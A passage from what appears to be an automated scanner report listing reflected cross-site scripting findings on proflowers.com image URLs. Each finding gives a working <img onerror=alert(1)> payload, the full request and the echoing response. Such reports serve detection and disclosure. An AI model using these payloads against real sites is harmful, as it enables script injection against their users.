GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12swtexp40nogyp_dmsk10_PF65b0f<img%20src%3da%20onerror%3dalert(1)>a549e23adca?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 104
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:49:33 GMT
Connection: close

Unable to find /ProvideCommerce/ROS12swtexp40nogyp_dmsk10_PF65b0f<img src=a onerror=alert(1)>a549e23adca
1.38. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12swtexp40nogyp_rbye10_FC_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12swtexp40nogyp_rbye10_FC_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 9481e<img%20src%3da%20onerror%3dalert(1)>4b0ca80c893 was submitted in the REST URL parameter 9. This input was echoed as 9481e<img src=a onerror=alert(1)>4b0ca80c893 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12swtexp40nogyp_rbye10_FC_PF9481e<img%20src%3da%20onerror%3dalert(1)>4b0ca80c893?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 107
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:55 GMT
Connection: close

Unable to find /ProvideCommerce/ROS12swtexp40nogyp_rbye10_FC_PF9481e<img src=a onerror=alert(1)>4b0ca80c893
1.39. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12white50_09_l [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12white50_09_l

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 4673a<img%20src%3da%20onerror%3dalert(1)>c73a060d77c was submitted in the REST URL parameter 9. This input was echoed as 4673a<img src=a onerror=alert(1)>c73a060d77c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12white50_09_l4673a<img%20src%3da%20onerror%3dalert(1)>c73a060d77c?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 93
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:33:01 GMT
Connection: close

Unable to find /ProvideCommerce/ROS12white50_09_l4673a<img src=a onerror=alert(1)>c73a060d77c
1.40. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS15assrtspray_rbye09_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS15assrtspray_rbye09_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 54cfb<img%20src%3da%20onerror%3dalert(1)>0456aff298b was submitted in the REST URL parameter 9. This input was echoed as 54cfb<img src=a onerror=alert(1)>0456aff298b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS15assrtspray_rbye09_PF54cfb<img%20src%3da%20onerror%3dalert(1)>0456aff298b?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 101
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:49:33 GMT
Connection: close

Unable to find /ProvideCommerce/ROS15assrtspray_rbye09_PF54cfb<img src=a onerror=alert(1)>0456aff298b
1.41. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS18red40_gv11_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS18red40_gv11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload c45fd<img%20src%3da%20onerror%3dalert(1)>becc4bb494f was submitted in the REST URL parameter 9. This input was echoed as c45fd<img src=a onerror=alert(1)>becc4bb494f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS18red40_gv11_PFc45fd<img%20src%3da%20onerror%3dalert(1)>becc4bb494f?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 94
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:56 GMT
Connection: close

Unable to find /ProvideCommerce/ROS18red40_gv11_PFc45fd<img src=a onerror=alert(1)>becc4bb494f
1.42. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24red40_rdtrmp09_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24red40_rdtrmp09_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 4e5f4<img%20src%3da%20onerror%3dalert(1)>757198edcc6 was submitted in the REST URL parameter 9. This input was echoed as 4e5f4<img src=a onerror=alert(1)>757198edcc6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24red40_rdtrmp09_PF4e5f4<img%20src%3da%20onerror%3dalert(1)>757198edcc6?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 98
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:51 GMT
Connection: close

Unable to find /ProvideCommerce/ROS24red40_rdtrmp09_PF4e5f4<img src=a onerror=alert(1)>757198edcc6
1.43. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24red50_rbye11_FRV_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24red50_rbye11_FRV_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 9397a<img%20src%3da%20onerror%3dalert(1)>6dfee76ddd was submitted in the REST URL parameter 9. This input was echoed as 9397a<img src=a onerror=alert(1)>6dfee76ddd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24red50_rbye11_FRV_PF9397a<img%20src%3da%20onerror%3dalert(1)>6dfee76ddd?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 99
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:51 GMT
Connection: close

Unable to find /ProvideCommerce/ROS24red50_rbye11_FRV_PF9397a<img src=a onerror=alert(1)>6dfee76ddd
1.44. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24red50_rbye11_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24red50_rbye11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload f5af5<img%20src%3da%20onerror%3dalert(1)>6a39f0929c2 was submitted in the REST URL parameter 9. This input was echoed as f5af5<img src=a onerror=alert(1)>6a39f0929c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24red50_rbye11_PFf5af5<img%20src%3da%20onerror%3dalert(1)>6a39f0929c2?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=120&hei=140 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 96
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:49:34 GMT
Connection: close

Unable to find /ProvideCommerce/ROS24red50_rbye11_PFf5af5<img src=a onerror=alert(1)>6a39f0929c2
1.45. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS36Red50_rbyg11_FRG_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS36Red50_rbyg11_FRG_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 3f820<img%20src%3da%20onerror%3dalert(1)>765038f592b was submitted in the REST URL parameter 9. This input was echoed as 3f820<img src=a onerror=alert(1)>765038f592b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS36Red50_rbyg11_FRG_PF3f820<img%20src%3da%20onerror%3dalert(1)>765038f592b?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 100
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:51 GMT
Connection: close

Unable to find /ProvideCommerce/ROS36Red50_rbyg11_FRG_PF3f820<img src=a onerror=alert(1)>765038f592b
1.46. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS48assrtpet_gv09_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS48assrtpet_gv09_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload a2e58<img%20src%3da%20onerror%3dalert(1)>5024d153cf9 was submitted in the REST URL parameter 9. This input was echoed as a2e58<img src=a onerror=alert(1)>5024d153cf9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS48assrtpet_gv09_PFa2e58<img%20src%3da%20onerror%3dalert(1)>5024d153cf9?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 97
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:54 GMT
Connection: close

Unable to find /ProvideCommerce/ROS48assrtpet_gv09_PFa2e58<img src=a onerror=alert(1)>5024d153cf9
1.47. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS_PAS_dynamite40_10_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS_PAS_dynamite40_10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 5a67f<img%20src%3da%20onerror%3dalert(1)>9bcc720745 was submitted in the REST URL parameter 9. This input was echoed as 5a67f<img src=a onerror=alert(1)>9bcc720745 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS_PAS_dynamite40_10_PF5a67f<img%20src%3da%20onerror%3dalert(1)>9bcc720745?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 99
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:57 GMT
Connection: close

Unable to find /ProvideCommerce/ROS_PAS_dynamite40_10_PF5a67f<img src=a onerror=alert(1)>9bcc720745
1.48. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/RubyVase_tn [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/RubyVase_tn

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload c866d<img%20src%3da%20onerror%3dalert(1)>154ac83e716 was submitted in the REST URL parameter 9. This input was echoed as c866d<img src=a onerror=alert(1)>154ac83e716 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/RubyVase_tnc866d<img%20src%3da%20onerror%3dalert(1)>154ac83e716?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&hei=73 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/18-Red-Roses-30050119?viewpos=2&trackingpgroup=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 87
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:35:07 GMT
Connection: close

Unable to find /ProvideCommerce/RubyVase_tnc866d<img src=a onerror=alert(1)>154ac83e716
1.49. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CXNLOVECUD11_GvnLoveCud_EDY_11_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CXNLOVECUD11_GvnLoveCud_EDY_11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 5603a<img%20src%3da%20onerror%3dalert(1)>7a612d79cef was submitted in the REST URL parameter 9. This input was echoed as 5603a<img src=a onerror=alert(1)>7a612d79cef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CXNLOVECUD11_GvnLoveCud_EDY_11_PF5603a<img%20src%3da%20onerror%3dalert(1)>7a612d79cef?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 113
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:33:02 GMT
Connection: close

Unable to find /ProvideCommerce/SNK_CXNLOVECUD11_GvnLoveCud_EDY_11_PF5603a<img src=a onerror=alert(1)>7a612d79cef
1.50. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL15swthrt_gv09_2_FC_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL15swthrt_gv09_2_FC_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 9c7cf<img%20src%3da%20onerror%3dalert(1)>fc11b4a6f5d was submitted in the REST URL parameter 9. This input was echoed as 9c7cf<img src=a onerror=alert(1)>fc11b4a6f5d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL15swthrt_gv09_2_FC_PF9c7cf<img%20src%3da%20onerror%3dalert(1)>fc11b4a6f5d?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 100
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:55 GMT
Connection: close

Unable to find /ProvideCommerce/TUL15swthrt_gv09_2_FC_PF9c7cf<img src=a onerror=alert(1)>fc11b4a6f5d
1.51. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20assrt_dmsk11_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20assrt_dmsk11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 5b4b5<img%20src%3da%20onerror%3dalert(1)>e71fc12cb50 was submitted in the REST URL parameter 9. This input was echoed as 5b4b5<img src=a onerror=alert(1)>e71fc12cb50 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20assrt_dmsk11_PF5b4b5<img%20src%3da%20onerror%3dalert(1)>e71fc12cb50?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 96
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:54 GMT
Connection: close

Unable to find /ProvideCommerce/TUL20assrt_dmsk11_PF5b4b5<img src=a onerror=alert(1)>e71fc12cb50
1.52. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20hol_dmsk11_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20hol_dmsk11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 3a285<img%20src%3da%20onerror%3dalert(1)>3b6606d8bca was submitted in the REST URL parameter 9. This input was echoed as 3a285<img src=a onerror=alert(1)>3b6606d8bca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

